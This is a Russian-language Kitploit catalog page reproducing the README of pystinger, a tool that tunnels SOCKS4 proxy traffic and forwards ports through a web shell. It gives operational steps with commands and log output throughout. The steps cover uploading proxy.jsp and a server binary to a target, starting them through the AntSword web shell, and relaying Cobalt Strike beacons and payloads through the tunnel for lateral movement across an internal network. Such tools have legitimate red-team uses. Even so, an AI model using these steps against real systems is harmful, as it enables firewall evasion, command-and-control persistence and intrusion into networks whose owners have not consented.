Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pystinger — Обход брандмауэра для перенаправления трафика с использованием веб-шелла | Kitploit
Инструменты/GitHubGitHub/funnywolf/pystinger
Фреймворки для эксплойтовГенерация полезной нагрузкиОбход IDS/IPSЛатеральное перемещениеЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubfunnywolf/pystinger

pystinger

Обход брандмауэра для перенаправления трафика с использованием веб-шелла

Репозиторий
1.4k2044 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pystinger

English | 简体中文

Pystinger реализует SOCK4-прокси и проброс портов через веб-шелл.

Может напрямую использоваться с metasploit-framework, viper, cobalt strike для подключения сессий.

Pystinger разработан на Python и в настоящее время поддерживает три прокси-скрипта: php, jsp(x) и aspx.

Использование

Предположим, доменное имя сервера — http://example.com:8080. Внутренний IP-адрес сервера — 192.168.3.11

SOCK4-прокси

  • Загрузите proxy.jsp на целевой сервер и убедитесь, что http://example.com:8080/proxy.jsp доступен, страница возвращает UTF-8
  • Загрузите stinger_server.exe на целевой сервер, в AntSword выполните cmdstart D:/XXX/stinger_server.exe для запуска pystinger-server

Не запускайте D:/xxx/singer_server.exe напрямую, это приведет к разрыву TCP-соединения

  • Запустите ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 на вашем VPS
  • Вы увидите следующий вывод:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Теперь у вас запущен socks4a-прокси на VPS 127.0.0.1:60000 для внутренней сети example.com.
  • Теперь целевой сервер (example.com) 127.0.0.1:60020 проброшен на VPS 127.0.0.1:60020.

Подключение beacon в cobaltstrike для одной цели

  • Загрузите proxy.jsp на целевой сервер и убедитесь, что http://example.com:8080/proxy.jsp доступен, страница возвращает UTF-8
  • Загрузите stinger_server.exe на целевой сервер, в AntSword выполните cmdstart D:/XXX/stinger_server.exe для запуска pystinger-server

Не запускайте D:/xxx/singer_server.exe напрямую, это приведет к разрыву TCP-соединения

  • Запустите ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 на вашем VPS
  • Вы увидите следующий вывод:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Добавьте слушатель в cobaltstrike, порт слушателя — 60020 (порт Handler/LISTEN из RAT CONFIG вывода), адрес слушателя — 127.0.0.1.
  • Сгенерируйте полезную нагрузку, загрузите на цель и запустите.

Подключение beacon в cobaltstrike для нескольких целей

  • Загрузите proxy.jsp на целевой сервер и убедитесь, что http://example.com:8080/proxy.jsp доступен, страница возвращает UTF-8
  • Загрузите stinger_server.exe на целевой сервер, в AntSword выполните cmdstart D:/XXX/stinger_server.exe 192.168.3.11 для запуска pystinger-server (192.168.3.11 — внутренний IP-адрес цели)

192.168.3.11 можно заменить на 0.0.0.0

  • Запустите ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 на вашем VPS
  • Вы увидите следующий вывод:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Добавьте слушатель в cobaltstrike, порт слушателя — 60020 (порт Handler/LISTEN из RAT CONFIG вывода), адрес слушателя — 192.168.3.11.
  • Сгенерируйте полезную нагрузку, загрузите на цель и запустите.
  • При горизонтальном перемещении на другие хосты вы можете указать полезной нагрузке адрес 192.168.3.11:60020 для подключения beacon.

Пользовательские заголовки и прокси

  • Если веб-шеллу требуется настроить cookie или авторизацию, можно настроить заголовки запроса через параметр --header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • Если веб-шелл должен быть доступен через прокси, можно установить прокси через --proxy --proxy "socks5:127.0.0.1:1081"

Связанные инструменты

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

Протестировано

stinger_server\stinger_client

  • Windows
  • Linux

proxy.jsp(x)/php/aspx

  • PHP 7.2
  • Tomcat 7.0
  • IIS 8.0

Журнал обновлений

2.0 Дата обновления: 2019-09-29

  • Сервис Socks4-прокси перенесён на клиент

2.1 Дата обновления: 2020-01-07

  • Поддержка онлайн-подключения cobaltstrike (проброс портов)

Разработка поддержана программным обеспечением от JetBrains.
https://www.jetbrains.com/?from=pystinger

Скачать инструмент